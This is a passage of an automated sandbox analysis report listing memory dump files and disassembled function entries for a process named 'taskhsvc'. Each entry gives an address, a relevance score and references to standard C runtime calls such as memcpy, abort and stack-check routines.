    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031F194, Relevance: 7.6, APIs: 5, Instructions: 143
    APIs
    • abort.MSVCRT ref: 0031F1F0
    • abort.MSVCRT ref: 0031F22F
    • abort.MSVCRT ref: 0031F26E
      • Part of subcall function 0031E52A: memcpy.MSVCRT ref: 0031E55E
      • Part of subcall function 0031E52A: __stack_chk_fail.LIBSSP-0 ref: 0031E56F
      • Part of subcall function 0031D513: memset.MSVCRT ref: 0031D60E
      • Part of subcall function 0031D513: memset.MSVCRT ref: 0031D715
      • Part of subcall function 0031D513: __stack_chk_fail.LIBSSP-0(?), ref: 0031D7EB
      • Part of subcall function 0031C580: __stack_chk_fail.LIBSSP-0 ref: 0031C5B7
      • Part of subcall function 0031D085: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0031D164), ref: 0031D112
    • __stack_chk_fail.LIBSSP-0 ref: 0031F3A5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031F319
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031E604: memcpy.MSVCRT ref: 0031E638
      • Part of subcall function 0031E604: __stack_chk_fail.LIBSSP-0 ref: 0031E649
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002374BF, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169
    APIs
      • Part of subcall function 00233770: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002578D1), ref: 0023379C
      • Part of subcall function 002B6941: __stack_chk_fail.LIBSSP-0 ref: 002B69E5
      • Part of subcall function 00249522: abort.MSVCRT ref: 00249572
      • Part of subcall function 00249522: __stack_chk_fail.LIBSSP-0 ref: 002495A9
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 002C1874: __stack_chk_fail.LIBSSP-0 ref: 002C1911
      • Part of subcall function 003081DD: __stack_chk_fail.LIBSSP-0 ref: 0030826A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002376EC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DC97F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00223659: __stack_chk_fail.LIBSSP-0 ref: 002236FF
      • Part of subcall function 00276C11: abort.MSVCRT ref: 00276C61
      • Part of subcall function 00276C11: __stack_chk_fail.LIBSSP-0 ref: 00276C85
      • Part of subcall function 00276D83: abort.MSVCRT ref: 00276DD3
      • Part of subcall function 00276D83: __stack_chk_fail.LIBSSP-0 ref: 00276DF7
    • free.MSVCRT ref: 001DCB5D
    • __stack_chk_fail.LIBSSP-0 ref: 001DCB92
      • Part of subcall function 0026DD89: abort.MSVCRT ref: 0026DDDB
      • Part of subcall function 0026DD89: __stack_chk_fail.LIBSSP-0 ref: 0026DFCD
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEDC3
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEE06
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEE91
      • Part of subcall function 002FED64: free.MSVCRT ref: 002FEEC9
      • Part of subcall function 002FED64: free.MSVCRT ref: 002FF023
      • Part of subcall function 002FED64: __stack_chk_fail.LIBSSP-0 ref: 002FF03D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F0A12, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001F0A3E
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001F0D83: abort.MSVCRT ref: 001F12C4
      • Part of subcall function 001F0D83: __stack_chk_fail.LIBSSP-0 ref: 001F1529
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00212830: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 0021288C
      • Part of subcall function 00212830: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 00212932
      • Part of subcall function 002FA2E7: __stack_chk_fail.LIBSSP-0 ref: 002FA438
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 00216D57: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001C2F3A), ref: 00216DA7
      • Part of subcall function 00216D57: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C2F3A), ref: 00216DE3
    • __stack_chk_fail.LIBSSP-0 ref: 001F0D39
      • Part of subcall function 001E88E4: abort.MSVCRT ref: 001E893A
      • Part of subcall function 001E88E4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA517), ref: 001E894D
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EA9F9
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA3B
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA7A
      • Part of subcall function 001EA98A: time.MSVCRT ref: 001EABA2
      • Part of subcall function 001EA98A: __stack_chk_fail.LIBSSP-0 ref: 001EABBD
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E4071, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100
    APIs
      • Part of subcall function 001E378D: abort.MSVCRT ref: 001E37E0
      • Part of subcall function 001E378D: __stack_chk_fail.LIBSSP-0 ref: 001E381F
      • Part of subcall function 001E34DB: abort.MSVCRT ref: 001E35A1
      • Part of subcall function 001E34DB: memset.MSVCRT ref: 001E35BC
      • Part of subcall function 001E34DB: __stack_chk_fail.LIBSSP-0 ref: 001E35CF
      • Part of subcall function 0033084A: __stack_chk_fail.LIBSSP-0 ref: 00330886
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003265E9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100
    APIs
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325D72
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DB1
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DF6
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325ECF
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00325CFA: _close.MSVCRT ref: 00325F8C
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FB5
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FDD
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FFF
      • Part of subcall function 00325CFA: __stack_chk_fail.LIBSSP-0 ref: 0032601B
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
